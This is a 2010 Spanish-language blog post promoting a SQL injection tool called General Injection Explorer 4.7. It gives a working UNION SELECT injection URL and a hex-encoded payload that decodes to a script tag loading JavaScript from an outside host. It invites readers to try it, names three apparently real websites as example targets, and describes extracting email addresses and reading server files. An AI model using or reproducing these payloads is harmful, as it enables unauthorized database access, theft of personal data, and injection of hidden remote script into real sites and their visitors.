8 abr. 2010

[General Injection Explorer 4.7] Herramienta para SQL Injection

Bueno... navegando por ahí me encuentro con una de las mejores herramientas de SQL Injection que me ha tocado probar...

Es sin duda una execelente herramienta que vale la pena tener siempre en cuenta, ya que su uso es extremadamente sencillo y no se requiere de ningún tipo de instalación.

Lo único que necesitas es una web vulnerable a SQLi con el formato:
http://www.webvulnerable.com/new.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12--

[+] vuln in num/s: |2|3|

Entonces el código GIE 4.7 (General Injection Explorer 4.7) se pone en algún número visible:
http://www.webvulnerable.com/new.php?id=-1+union+select+0,1,(GIE),3,4,5,6,7,8,9,10,11,12--

Código GIE 4.7:
(0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Entonces la URL final quedaría así:
http://www.webvulnerable.com/new.php?id=-1+union+select+0,1,(0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9,10,11,12--

Ahora pruebenlo ustedes y disfrútenlo...

[*] Screens:

explorador de bases de datos.

lector de archivos, con Bruteforce.

 
consola de peticiones, en la imagen un ejemplo 
de una query que busca mails en la base de datos.


 
variables del servidor

 
Historial de Inyecciones, para el que quiera 
saber un poco mas sobre el funcionamiento de la GIE


[*] Ejemplos:

SQLi GIE [adegasgalegas.es]
SQLi GIE [rubias19.com]
SQLi GIE [comic-ar.com]

Codigo de fuente de GIE 4.7

Fuente: http://ponymagic.diosdelared.com/

[+] Salu2
[+] ZioneR